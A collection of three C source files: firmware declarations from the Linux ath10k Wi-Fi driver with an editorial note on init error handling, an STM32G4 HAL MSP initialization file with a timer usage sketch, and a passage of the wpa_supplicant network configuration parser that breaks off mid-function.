MODULE_FIRMWARE(QCA9887_HW_1_0_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA6174 2.1 firmware files */ MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" ATH10K_FW_API4_FILE); MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" QCA6174_HW_2_1_BOARD_DATA_FILE); MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA6174 3.1 firmware files */ MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_FW_API4_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_FW_API6_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" QCA6174_HW_3_0_BOARD_DATA_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA9377 1.0 firmware files */ MODULE_FIRMWARE(QCA9377_HW_1_0_FW_DIR "/" ATH10K_FW_API6_FILE); MODULE_FIRMWARE(QCA9377_HW_1_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA9377_HW_1_0_FW_DIR "/" QCA9377_HW_1_0_BOARD_DATA_FILE);
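/*
 * Editorial sketch (not part of the original driver; the function name
 * below is hypothetical): ath10k_pci_init() above returns the result of
 * ath10k_ahb_init() even when pci_register_driver() has already failed,
 * so a PCI registration error can be masked by a successful AHB init.
 * A stricter variant would propagate the first error and unwind:
 *
 *	static int __init ath10k_pci_init_strict(void)
 *	{
 *		int ret;
 *
 *		ret = pci_register_driver(&ath10k_pci_driver);
 *		if (ret)
 *			return ret;
 *
 *		ret = ath10k_ahb_init();
 *		if (ret)
 *			pci_unregister_driver(&ath10k_pci_driver);
 *		return ret;
 *	}
 */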
254911.c
/* USER CODE BEGIN Header */
/**
  ******************************************************************************
  * File Name          : stm32g4xx_hal_msp.c
  * Description        : This file provides code for the MSP Initialization
  *                      and de-Initialization code.
  ******************************************************************************
  * @attention
  *
  * <h2><center>&copy; Copyright (c) 2019 STMicroelectronics.
  * All rights reserved.</center></h2>
  *
  * This software component is licensed by ST under BSD 3-Clause license,
  * the "License"; You may not use this file except in compliance with the
  * License. You may obtain a copy of the License at:
  *                        opensource.org/licenses/BSD-3-Clause
  *
  ******************************************************************************
  */
/* USER CODE END Header */

/* Includes ------------------------------------------------------------------*/
#include "main.h"
/* USER CODE BEGIN Includes */

/* USER CODE END Includes */

/* Private typedef -----------------------------------------------------------*/
/* USER CODE BEGIN TD */

/* USER CODE END TD */

/* Private define ------------------------------------------------------------*/
/* USER CODE BEGIN Define */

/* USER CODE END Define */

/* Private macro -------------------------------------------------------------*/
/* USER CODE BEGIN Macro */

/* USER CODE END Macro */

/* Private variables ---------------------------------------------------------*/
/* USER CODE BEGIN PV */

/* USER CODE END PV */

/* Private function prototypes -----------------------------------------------*/
/* USER CODE BEGIN PFP */

/* USER CODE END PFP */

/* External functions --------------------------------------------------------*/
/* USER CODE BEGIN ExternalFunctions */

/* USER CODE END ExternalFunctions */

/* USER CODE BEGIN 0 */

/* USER CODE END 0 */
/**
  * Initializes the Global MSP.
  */
void HAL_MspInit(void)
{
  /* USER CODE BEGIN MspInit 0 */

  /* USER CODE END MspInit 0 */

  __HAL_RCC_SYSCFG_CLK_ENABLE();
  __HAL_RCC_PWR_CLK_ENABLE();

  /* System interrupt init*/

  /** Disable the internal Pull-Up in Dead Battery pins of UCPD peripheral
  */
  LL_PWR_DisableDeadBatteryPD();

  /* USER CODE BEGIN MspInit 1 */

  /* USER CODE END MspInit 1 */
}

/**
  * @brief TIM_Base MSP Initialization
  * This function configures the hardware resources used in this example
  * @param htim_base: TIM_Base handle pointer
  * @retval None
  */
void HAL_TIM_Base_MspInit(TIM_HandleTypeDef* htim_base)
{
  if(htim_base->Instance==TIM2)
  {
    /* USER CODE BEGIN TIM2_MspInit 0 */

    /* USER CODE END TIM2_MspInit 0 */
    /* Peripheral clock enable */
    __HAL_RCC_TIM2_CLK_ENABLE();
    /* TIM2 interrupt Init */
    HAL_NVIC_SetPriority(TIM2_IRQn, 0, 0);
    HAL_NVIC_EnableIRQ(TIM2_IRQn);
    /* USER CODE BEGIN TIM2_MspInit 1 */

    /* USER CODE END TIM2_MspInit 1 */
  }

}

/**
  * @brief TIM_Base MSP De-Initialization
  * This function frees the hardware resources used in this example
  * @param htim_base: TIM_Base handle pointer
  * @retval None
  */
void HAL_TIM_Base_MspDeInit(TIM_HandleTypeDef* htim_base)
{
  if(htim_base->Instance==TIM2)
  {
    /* USER CODE BEGIN TIM2_MspDeInit 0 */

    /* USER CODE END TIM2_MspDeInit 0 */
    /* Peripheral clock disable */
    __HAL_RCC_TIM2_CLK_DISABLE();

    /* TIM2 interrupt DeInit */
    HAL_NVIC_DisableIRQ(TIM2_IRQn);
    /* USER CODE BEGIN TIM2_MspDeInit 1 */

    /* USER CODE END TIM2_MspDeInit 1 */
  }

}

/* USER CODE BEGIN 1 */

/* USER CODE END 1 */

/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
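/*
 * Illustrative usage sketch (not CubeMX-generated; the handle name and
 * timing values below are hypothetical): the HAL calls the MSP hooks
 * above through weak-symbol overrides, so HAL_TIM_Base_Init() runs
 * HAL_TIM_Base_MspInit() and enables the TIM2 clock and IRQ before the
 * timer is started:
 *
 *	TIM_HandleTypeDef htim2;
 *
 *	htim2.Instance = TIM2;
 *	htim2.Init.Prescaler = 15999;
 *	htim2.Init.CounterMode = TIM_COUNTERMODE_UP;
 *	htim2.Init.Period = 999;
 *	htim2.Init.ClockDivision = TIM_CLOCKDIVISION_DIV1;
 *	if (HAL_TIM_Base_Init(&htim2) == HAL_OK)
 *		HAL_TIM_Base_Start_IT(&htim2);
 */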
515096.c
/* * WPA Supplicant / Configuration parser and common functions * Copyright (c) 2003-2012, Jouni Malinen <j@w1.fi> * * This software may be distributed under the terms of the BSD license. * See README for more details. */ #include "includes.h" #include "common.h" #include "utils/uuid.h" #include "utils/ip_addr.h" #include "crypto/sha1.h" #include "rsn_supp/wpa.h" #include "eap_peer/eap.h" #include "p2p/p2p.h" #include "config.h" #if !defined(CONFIG_CTRL_IFACE) && defined(CONFIG_NO_CONFIG_WRITE) #define NO_CONFIG_WRITE #endif /* * Structure for network configuration parsing. This data is used to implement * a generic parser for each network block variable. The table of configuration * variables is defined below in this file (ssid_fields[]). */ struct parse_data { /* Configuration variable name */ char *name; /* Parser function for this variable */ int (*parser)(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value); #ifndef NO_CONFIG_WRITE /* Writer function (i.e., to get the variable in text format from * internal presentation). */ char * (*writer)(const struct parse_data *data, struct wpa_ssid *ssid); #endif /* NO_CONFIG_WRITE */ /* Variable specific parameters for the parser. */ void *param1, *param2, *param3, *param4; /* 0 = this variable can be included in debug output and ctrl_iface * 1 = this variable contains key/private data and it must not be * included in debug output unless explicitly requested. In * addition, this variable will not be readable through the * ctrl_iface. */ int key_data; }; static int wpa_config_parse_str(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { size_t res_len, *dst_len; char **dst, *tmp; if (os_strcmp(value, "NULL") == 0) { wpa_printf(MSG_DEBUG, "Unset configuration string '%s'", data->name); tmp = NULL; res_len = 0; goto set; } tmp = wpa_config_parse_string(value, &res_len); if (tmp == NULL) { wpa_printf(MSG_ERROR, "Line %d: failed to parse %s '%s'.", line, data->name, data->key_data ? 
"[KEY DATA REMOVED]" : value); return -1; } if (data->key_data) { wpa_hexdump_ascii_key(MSG_MSGDUMP, data->name, (u8 *) tmp, res_len); } else { wpa_hexdump_ascii(MSG_MSGDUMP, data->name, (u8 *) tmp, res_len); } if (data->param3 && res_len < (size_t) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too short %s (len=%lu " "min_len=%ld)", line, data->name, (unsigned long) res_len, (long) data->param3); os_free(tmp); return -1; } if (data->param4 && res_len > (size_t) data->param4) { wpa_printf(MSG_ERROR, "Line %d: too long %s (len=%lu " "max_len=%ld)", line, data->name, (unsigned long) res_len, (long) data->param4); os_free(tmp); return -1; } set: dst = (char **) (((u8 *) ssid) + (long) data->param1); dst_len = (size_t *) (((u8 *) ssid) + (long) data->param2); os_free(*dst); *dst = tmp; if (data->param2) *dst_len = res_len; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_string_ascii(const u8 *value, size_t len) { char *buf; buf = os_malloc(len + 3); if (buf == NULL) return NULL; buf[0] = '"'; os_memcpy(buf + 1, value, len); buf[len + 1] = '"'; buf[len + 2] = '\0'; return buf; } static char * wpa_config_write_string_hex(const u8 *value, size_t len) { char *buf; buf = os_zalloc(2 * len + 1); if (buf == NULL) return NULL; wpa_snprintf_hex(buf, 2 * len + 1, value, len); return buf; } static char * wpa_config_write_string(const u8 *value, size_t len) { if (value == NULL) return NULL; if (is_hex(value, len)) return wpa_config_write_string_hex(value, len); else return wpa_config_write_string_ascii(value, len); } static char * wpa_config_write_str(const struct parse_data *data, struct wpa_ssid *ssid) { size_t len; char **src; src = (char **) (((u8 *) ssid) + (long) data->param1); if (*src == NULL) return NULL; if (data->param2) len = *((size_t *) (((u8 *) ssid) + (long) data->param2)); else len = os_strlen(*src); return wpa_config_write_string((const u8 *) *src, len); } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_int(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val, *dst; char *end; dst = (int *) (((u8 *) ssid) + (long) data->param1); val = strtol(value, &end, 0); if (*end) { wpa_printf(MSG_ERROR, "Line %d: invalid number \"%s\"", line, value); return -1; } *dst = val; wpa_printf(MSG_MSGDUMP, "%s=%d (0x%x)", data->name, *dst, *dst); if (data->param3 && *dst < (long) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too small %s (value=%d " "min_value=%ld)", line, data->name, *dst, (long) data->param3); *dst = (long) data->param3; return -1; } if (data->param4 && *dst > (long) data->param4) { wpa_printf(MSG_ERROR, "Line %d: too large %s (value=%d " "max_value=%ld)", line, data->name, *dst, (long) data->param4); *dst = (long) data->param4; return -1; } return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_int(const struct parse_data *data, struct wpa_ssid *ssid) { int *src, res; char *value; src = (int *) (((u8 *) ssid) + (long) data->param1); value = os_malloc(20); if (value == NULL) return NULL; res = os_snprintf(value, 20, "%d", *src); if (res < 0 || res >= 20) { os_free(value); return NULL; } value[20 - 1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_bssid(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { if (value[0] == '\0' || os_strcmp(value, "\"\"") == 0 || os_strcmp(value, "any") == 0) { ssid->bssid_set = 0; wpa_printf(MSG_MSGDUMP, "BSSID any"); return 0; } if (hwaddr_aton(value, ssid->bssid)) { wpa_printf(MSG_ERROR, "Line %d: Invalid 
BSSID '%s'.", line, value); return -1; } ssid->bssid_set = 1; wpa_hexdump(MSG_MSGDUMP, "BSSID", ssid->bssid, ETH_ALEN); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_bssid(const struct parse_data *data, struct wpa_ssid *ssid) { char *value; int res; if (!ssid->bssid_set) return NULL; value = os_malloc(20); if (value == NULL) return NULL; res = os_snprintf(value, 20, MACSTR, MAC2STR(ssid->bssid)); if (res < 0 || res >= 20) { os_free(value); return NULL; } value[20 - 1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_psk(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { #ifdef CONFIG_EXT_PASSWORD if (os_strncmp(value, "ext:", 4) == 0) { str_clear_free(ssid->passphrase); ssid->passphrase = NULL; ssid->psk_set = 0; os_free(ssid->ext_psk); ssid->ext_psk = os_strdup(value + 4); if (ssid->ext_psk == NULL) return -1; wpa_printf(MSG_DEBUG, "PSK: External password '%s'", ssid->ext_psk); return 0; } #endif /* CONFIG_EXT_PASSWORD */ if (*value == '"') { #ifndef CONFIG_NO_PBKDF2 const char *pos; size_t len; value++; pos = os_strrchr(value, '"'); if (pos) len = pos - value; else len = os_strlen(value); if (len < 8 || len > 63) { wpa_printf(MSG_ERROR, "Line %d: Invalid passphrase " "length %lu (expected: 8..63) '%s'.", line, (unsigned long) len, value); return -1; } wpa_hexdump_ascii_key(MSG_MSGDUMP, "PSK (ASCII passphrase)", (u8 *) value, len); if (ssid->passphrase && os_strlen(ssid->passphrase) == len && os_memcmp(ssid->passphrase, value, len) == 0) return 0; ssid->psk_set = 0; str_clear_free(ssid->passphrase); ssid->passphrase = dup_binstr(value, len); if (ssid->passphrase == NULL) return -1; return 0; #else /* CONFIG_NO_PBKDF2 */ wpa_printf(MSG_ERROR, "Line %d: ASCII passphrase not " "supported.", line); return -1; #endif /* CONFIG_NO_PBKDF2 */ } if (hexstr2bin(value, ssid->psk, PMK_LEN) || value[PMK_LEN * 2] != '\0') { wpa_printf(MSG_ERROR, "Line %d: Invalid PSK '%s'.", line, value); return -1; } str_clear_free(ssid->passphrase); ssid->passphrase = NULL; ssid->psk_set = 1; wpa_hexdump_key(MSG_MSGDUMP, "PSK", ssid->psk, PMK_LEN); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_psk(const struct parse_data *data, struct wpa_ssid *ssid) { #ifdef CONFIG_EXT_PASSWORD if (ssid->ext_psk) { size_t len = 4 + os_strlen(ssid->ext_psk) + 1; char *buf = os_malloc(len); if (buf == NULL) return NULL; os_snprintf(buf, len, "ext:%s", ssid->ext_psk); return buf; } #endif /* CONFIG_EXT_PASSWORD */ if (ssid->passphrase) return wpa_config_write_string_ascii( (const u8 *) ssid->passphrase, os_strlen(ssid->passphrase)); if (ssid->psk_set) return wpa_config_write_string_hex(ssid->psk, PMK_LEN); return NULL; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_proto(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val = 0, last, errors = 0; char *start, *end, *buf; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; if (os_strcmp(start, "WPA") == 0) val |= WPA_PROTO_WPA; else if (os_strcmp(start, "RSN") == 0 || os_strcmp(start, "WPA2") == 0) val |= WPA_PROTO_RSN; else if (os_strcmp(start, "OSEN") == 0) val |= WPA_PROTO_OSEN; else { wpa_printf(MSG_ERROR, "Line %d: invalid proto '%s'", line, start); errors++; } if (last) break; start = end + 1; } os_free(buf); 
if (val == 0) { wpa_printf(MSG_ERROR, "Line %d: no proto values configured.", line); errors++; } wpa_printf(MSG_MSGDUMP, "proto: 0x%x", val); ssid->proto = val; return errors ? -1 : 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_proto(const struct parse_data *data, struct wpa_ssid *ssid) { int ret; char *buf, *pos, *end; pos = buf = os_zalloc(20); if (buf == NULL) return NULL; end = buf + 20; if (ssid->proto & WPA_PROTO_WPA) { ret = os_snprintf(pos, end - pos, "%sWPA", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } if (ssid->proto & WPA_PROTO_RSN) { ret = os_snprintf(pos, end - pos, "%sRSN", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } if (ssid->proto & WPA_PROTO_OSEN) { ret = os_snprintf(pos, end - pos, "%sOSEN", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } if (pos == buf) { os_free(buf); buf = NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_key_mgmt(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val = 0, last, errors = 0; char *start, *end, *buf; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; if (os_strcmp(start, "WPA-PSK") == 0) val |= WPA_KEY_MGMT_PSK; else if (os_strcmp(start, "WPA-EAP") == 0) val |= WPA_KEY_MGMT_IEEE8021X; else if (os_strcmp(start, "IEEE8021X") == 0) val |= WPA_KEY_MGMT_IEEE8021X_NO_WPA; else if (os_strcmp(start, "NONE") == 0) val |= WPA_KEY_MGMT_NONE; else if (os_strcmp(start, "WPA-NONE") == 0) val |= WPA_KEY_MGMT_WPA_NONE; #ifdef CONFIG_IEEE80211R else if (os_strcmp(start, "FT-PSK") == 0) val |= WPA_KEY_MGMT_FT_PSK; else if (os_strcmp(start, "FT-EAP") == 0) val |= WPA_KEY_MGMT_FT_IEEE8021X; #endif /* CONFIG_IEEE80211R */ #ifdef CONFIG_IEEE80211W else if (os_strcmp(start, "WPA-PSK-SHA256") == 0) val |= WPA_KEY_MGMT_PSK_SHA256; else if (os_strcmp(start, "WPA-EAP-SHA256") == 0) val |= WPA_KEY_MGMT_IEEE8021X_SHA256; #endif /* CONFIG_IEEE80211W */ #ifdef CONFIG_WPS else if (os_strcmp(start, "WPS") == 0) val |= WPA_KEY_MGMT_WPS; #endif /* CONFIG_WPS */ #ifdef CONFIG_SAE else if (os_strcmp(start, "SAE") == 0) val |= WPA_KEY_MGMT_SAE; else if (os_strcmp(start, "FT-SAE") == 0) val |= WPA_KEY_MGMT_FT_SAE; #endif /* CONFIG_SAE */ #ifdef CONFIG_HS20 else if (os_strcmp(start, "OSEN") == 0) val |= WPA_KEY_MGMT_OSEN; #endif /* CONFIG_HS20 */ else { wpa_printf(MSG_ERROR, "Line %d: invalid key_mgmt '%s'", line, start); errors++; } if (last) break; start = end + 1; } os_free(buf); if (val == 0) { wpa_printf(MSG_ERROR, "Line %d: no key_mgmt values configured.", line); errors++; } wpa_printf(MSG_MSGDUMP, "key_mgmt: 0x%x", val); ssid->key_mgmt = val; return errors ? -1 : 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_key_mgmt(const struct parse_data *data, struct wpa_ssid *ssid) { char *buf, *pos, *end; int ret; pos = buf = os_zalloc(100); if (buf == NULL) return NULL; end = buf + 100; if (ssid->key_mgmt & WPA_KEY_MGMT_PSK) { ret = os_snprintf(pos, end - pos, "%sWPA-PSK", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_IEEE8021X) { ret = os_snprintf(pos, end - pos, "%sWPA-EAP", pos == buf ? 
"" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_IEEE8021X_NO_WPA) { ret = os_snprintf(pos, end - pos, "%sIEEE8021X", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_NONE) { ret = os_snprintf(pos, end - pos, "%sNONE", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_WPA_NONE) { ret = os_snprintf(pos, end - pos, "%sWPA-NONE", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #ifdef CONFIG_IEEE80211R if (ssid->key_mgmt & WPA_KEY_MGMT_FT_PSK) { ret = os_snprintf(pos, end - pos, "%sFT-PSK", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_FT_IEEE8021X) { ret = os_snprintf(pos, end - pos, "%sFT-EAP", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #endif /* CONFIG_IEEE80211R */ #ifdef CONFIG_IEEE80211W if (ssid->key_mgmt & WPA_KEY_MGMT_PSK_SHA256) { ret = os_snprintf(pos, end - pos, "%sWPA-PSK-SHA256", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_IEEE8021X_SHA256) { ret = os_snprintf(pos, end - pos, "%sWPA-EAP-SHA256", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #endif /* CONFIG_IEEE80211W */ #ifdef CONFIG_WPS if (ssid->key_mgmt & WPA_KEY_MGMT_WPS) { ret = os_snprintf(pos, end - pos, "%sWPS", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #endif /* CONFIG_WPS */ if (pos == buf) { os_free(buf); buf = NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_cipher(int line, const char *value) { int val = wpa_parse_cipher(value); if (val < 0) { wpa_printf(MSG_ERROR, "Line %d: invalid cipher '%s'.", line, value); return -1; } if (val == 0) { wpa_printf(MSG_ERROR, "Line %d: no cipher values configured.", line); return -1; } return val; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_cipher(int cipher) { char *buf = os_zalloc(50); if (buf == NULL) return NULL; if (wpa_write_ciphers(buf, buf + 50, cipher, " ") < 0) { os_free(buf); return NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_pairwise(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val; val = wpa_config_parse_cipher(line, value); if (val == -1) return -1; if (val & ~WPA_ALLOWED_PAIRWISE_CIPHERS) { wpa_printf(MSG_ERROR, "Line %d: not allowed pairwise cipher " "(0x%x).", line, val); return -1; } wpa_printf(MSG_MSGDUMP, "pairwise: 0x%x", val); ssid->pairwise_cipher = val; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_pairwise(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_cipher(ssid->pairwise_cipher); } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_group(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val; val = wpa_config_parse_cipher(line, value); if (val == -1) return -1; if (val & ~WPA_ALLOWED_GROUP_CIPHERS) { wpa_printf(MSG_ERROR, "Line %d: not allowed group cipher " "(0x%x).", line, val); return -1; } wpa_printf(MSG_MSGDUMP, "group: 0x%x", val); ssid->group_cipher = val; return 0; } #ifndef 
NO_CONFIG_WRITE static char * wpa_config_write_group(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_cipher(ssid->group_cipher); } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_auth_alg(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val = 0, last, errors = 0; char *start, *end, *buf; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; if (os_strcmp(start, "OPEN") == 0) val |= WPA_AUTH_ALG_OPEN; else if (os_strcmp(start, "SHARED") == 0) val |= WPA_AUTH_ALG_SHARED; else if (os_strcmp(start, "LEAP") == 0) val |= WPA_AUTH_ALG_LEAP; else { wpa_printf(MSG_ERROR, "Line %d: invalid auth_alg '%s'", line, start); errors++; } if (last) break; start = end + 1; } os_free(buf); if (val == 0) { wpa_printf(MSG_ERROR, "Line %d: no auth_alg values configured.", line); errors++; } wpa_printf(MSG_MSGDUMP, "auth_alg: 0x%x", val); ssid->auth_alg = val; return errors ? -1 : 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_auth_alg(const struct parse_data *data, struct wpa_ssid *ssid) { char *buf, *pos, *end; int ret; pos = buf = os_zalloc(30); if (buf == NULL) return NULL; end = buf + 30; if (ssid->auth_alg & WPA_AUTH_ALG_OPEN) { ret = os_snprintf(pos, end - pos, "%sOPEN", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->auth_alg & WPA_AUTH_ALG_SHARED) { ret = os_snprintf(pos, end - pos, "%sSHARED", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->auth_alg & WPA_AUTH_ALG_LEAP) { ret = os_snprintf(pos, end - pos, "%sLEAP", pos == buf ? 
"" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (pos == buf) { os_free(buf); buf = NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int * wpa_config_parse_int_array(const char *value) { int *freqs; size_t used, len; const char *pos; used = 0; len = 10; freqs = os_calloc(len + 1, sizeof(int)); if (freqs == NULL) return NULL; pos = value; while (pos) { while (*pos == ' ') pos++; if (used == len) { int *n; size_t i; n = os_realloc_array(freqs, len * 2 + 1, sizeof(int)); if (n == NULL) { os_free(freqs); return NULL; } for (i = len; i <= len * 2; i++) n[i] = 0; freqs = n; len *= 2; } freqs[used] = atoi(pos); if (freqs[used] == 0) break; used++; pos = os_strchr(pos + 1, ' '); } return freqs; } static int wpa_config_parse_scan_freq(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int *freqs; freqs = wpa_config_parse_int_array(value); if (freqs == NULL) return -1; if (freqs[0] == 0) { os_free(freqs); freqs = NULL; } os_free(ssid->scan_freq); ssid->scan_freq = freqs; return 0; } static int wpa_config_parse_freq_list(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int *freqs; freqs = wpa_config_parse_int_array(value); if (freqs == NULL) return -1; if (freqs[0] == 0) { os_free(freqs); freqs = NULL; } os_free(ssid->freq_list); ssid->freq_list = freqs; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_freqs(const struct parse_data *data, const int *freqs) { char *buf, *pos, *end; int i, ret; size_t count; if (freqs == NULL) return NULL; count = 0; for (i = 0; freqs[i]; i++) count++; pos = buf = os_zalloc(10 * count + 1); if (buf == NULL) return NULL; end = buf + 10 * count + 1; for (i = 0; freqs[i]; i++) { ret = os_snprintf(pos, end - pos, "%s%u", i == 0 ? 
"" : " ", freqs[i]); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } return buf; } static char * wpa_config_write_scan_freq(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_freqs(data, ssid->scan_freq); } static char * wpa_config_write_freq_list(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_freqs(data, ssid->freq_list); } #endif /* NO_CONFIG_WRITE */ #ifdef IEEE8021X_EAPOL static int wpa_config_parse_eap(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int last, errors = 0; char *start, *end, *buf; struct eap_method_type *methods = NULL, *tmp; size_t num_methods = 0; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; tmp = methods; methods = os_realloc_array(methods, num_methods + 1, sizeof(*methods)); if (methods == NULL) { os_free(tmp); os_free(buf); return -1; } methods[num_methods].method = eap_peer_get_type( start, &methods[num_methods].vendor); if (methods[num_methods].vendor == EAP_VENDOR_IETF && methods[num_methods].method == EAP_TYPE_NONE) { wpa_printf(MSG_ERROR, "Line %d: unknown EAP method " "'%s'", line, start); wpa_printf(MSG_ERROR, "You may need to add support for" " this EAP method during wpa_supplicant\n" "build time configuration.\n" "See README for more information."); errors++; } else if (methods[num_methods].vendor == EAP_VENDOR_IETF && methods[num_methods].method == EAP_TYPE_LEAP) ssid->leap++; else ssid->non_leap++; num_methods++; if (last) break; start = end + 1; } os_free(buf); tmp = methods; methods = os_realloc_array(methods, num_methods + 1, sizeof(*methods)); if (methods == NULL) { os_free(tmp); return -1; } methods[num_methods].vendor = EAP_VENDOR_IETF; methods[num_methods].method = EAP_TYPE_NONE; num_methods++; wpa_hexdump(MSG_MSGDUMP, "eap methods", (u8 *) methods, num_methods * sizeof(*methods)); os_free(ssid->eap.eap_methods); ssid->eap.eap_methods = methods; return errors ? -1 : 0; } static char * wpa_config_write_eap(const struct parse_data *data, struct wpa_ssid *ssid) { int i, ret; char *buf, *pos, *end; const struct eap_method_type *eap_methods = ssid->eap.eap_methods; const char *name; if (eap_methods == NULL) return NULL; pos = buf = os_zalloc(100); if (buf == NULL) return NULL; end = buf + 100; for (i = 0; eap_methods[i].vendor != EAP_VENDOR_IETF || eap_methods[i].method != EAP_TYPE_NONE; i++) { name = eap_get_name(eap_methods[i].vendor, eap_methods[i].method); if (name) { ret = os_snprintf(pos, end - pos, "%s%s", pos == buf ? 
